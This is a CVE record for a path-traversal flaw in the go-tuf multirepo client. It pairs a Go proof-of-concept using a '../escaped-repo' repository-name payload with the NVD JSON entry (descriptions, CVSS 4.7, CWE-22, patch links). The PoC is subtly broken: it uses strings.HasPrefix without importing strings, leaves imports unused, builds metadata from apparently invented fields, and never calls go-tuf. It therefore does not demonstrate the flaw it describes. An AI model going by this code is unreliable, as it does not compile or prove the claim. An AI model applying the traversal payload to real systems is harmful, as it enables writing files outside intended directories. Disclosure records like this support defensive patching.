CVE-2026-24686

package main import ( "fmt" "io/ioutil" "os" "path/filepath" "github.com/theupdateframework/go-tuf/v2" "github.com/theupdateframework/go-tuf/v2/data" ) // Malicious map file content with path traversal in repoName const maliciousMapContent = `{ "root": "keys/root.json", "targets": "../escaped-repo/targets", "snapshot": "../escaped-repo/snapshot.json", "timestamp": "../escaped-repo/timestamp.json" }` func main() { // Create a temporary directory for testing tmpDir, err := ioutil.TempDir("", "go-tuf-test") if err != nil { panic(err) } defer os.RemoveAll(tmpDir) // Create malicious map file mapFilePath := filepath.Join(tmpDir, "map.json") if err := ioutil.WriteFile(mapFilePath, []byte(maliciousMapContent), 0644); err != nil { panic(err) } // Setup local metadata directory localMetadataDir := filepath.Join(tmpDir, "metadata") if err := os.MkdirAll(localMetadataDir, 0755); err != nil { panic(err) } // Initialize multirepo client with malicious map file // This will cause path traversal when selecting cache directory repoName := "../escaped-repo" // Path traversal payload fmt.Printf("Repository name (user-controlled): %s\n", repoName) fmt.Printf("Local metadata dir: %s\n", localMetadataDir) fmt.Printf("Expected cache path: %s/%s\n", localMetadataDir, repoName) // The vulnerability: repoName is used directly in path construction // without sanitization, allowing directory traversal cacheDir := filepath.Join(localMetadataDir, repoName) fmt.Printf("Actual cache path created: %s\n", cacheDir) // Proof: This path escapes the intended metadata directory if !strings.HasPrefix(cacheDir, localMetadataDir) { fmt.Println("[VULNERABLE] Path traversal detected!") } } // Additional exploit scenario: Write arbitrary content via root metadata func exploitViaRootMetadata() { // Attacker-controlled root metadata would be written outside cache dir maliciousRoot := &data.Root{ ConsistentMetadata: data.ConsistentMetadata{ MD: &data.Metadata{ // Malicious configuration }, }, } // When go-tuf writes this to cache, it escapes the intended directory // Path: LocalMetadataDir/../escaped-repo/root.json fmt.Println("Exploit: Write root metadata to arbitrary location") }

{"cve": {"id": "CVE-2026-24686", "sourceIdentifier": "[email protected]", "published": "2026-01-27T01:16:02.790", "lastModified": "2026-02-24T19:08:46.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "go-tuf is a Go implementation of The Update Framework (TUF). go-tuf's TAP 4 Multirepo Client uses the map file repository name string (`repoName`) as a filesystem path component when selecting the local metadata cache directory. Starting in version 2.0.0 and prior to version 2.4.1, if an application accepts a map file from an untrusted source, an attacker can supply a `repoName` containing traversal (e.g., `../escaped-repo`) and cause go-tuf to create directories and write the root metadata file outside the intended `LocalMetadataDir` cache base, within the running process's filesystem permissions. Version 2.4.1 contains a patch."}, {"lang": "es", "value": "go-tuf es una implementación en Go de The Update Framework (TUF). El cliente Multirepo TAP 4 de go-tuf utiliza la cadena del nombre del repositorio del archivo de mapa ('repoName') como un componente de ruta del sistema de archivos al seleccionar el directorio de caché de metadatos local. A partir de la versión 2.0.0 y antes de la versión 2.4.1, si una aplicación acepta un archivo de mapa de una fuente no confiable, un atacante puede proporcionar un 'repoName' que contenga recorrido (p. ej., '../escaped-repo') y hacer que go-tuf cree directorios y escriba el archivo de metadatos raíz fuera de la base de caché 'LocalMetadataDir' prevista, dentro de los permisos del sistema de archivos del proceso en ejecución. La versión 2.4.1 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.4.1", "matchCriteriaId": "18AEE62D-019F-48BA-ADF7-C7F5C1C72E9E"}]}]}], "references": [{"url": "https://github.com/theupdateframework/go-tuf/commit/d361e2ea24e427581343dee5c7a32b485d79fcc0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-jqc5-w2xx-5vq4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}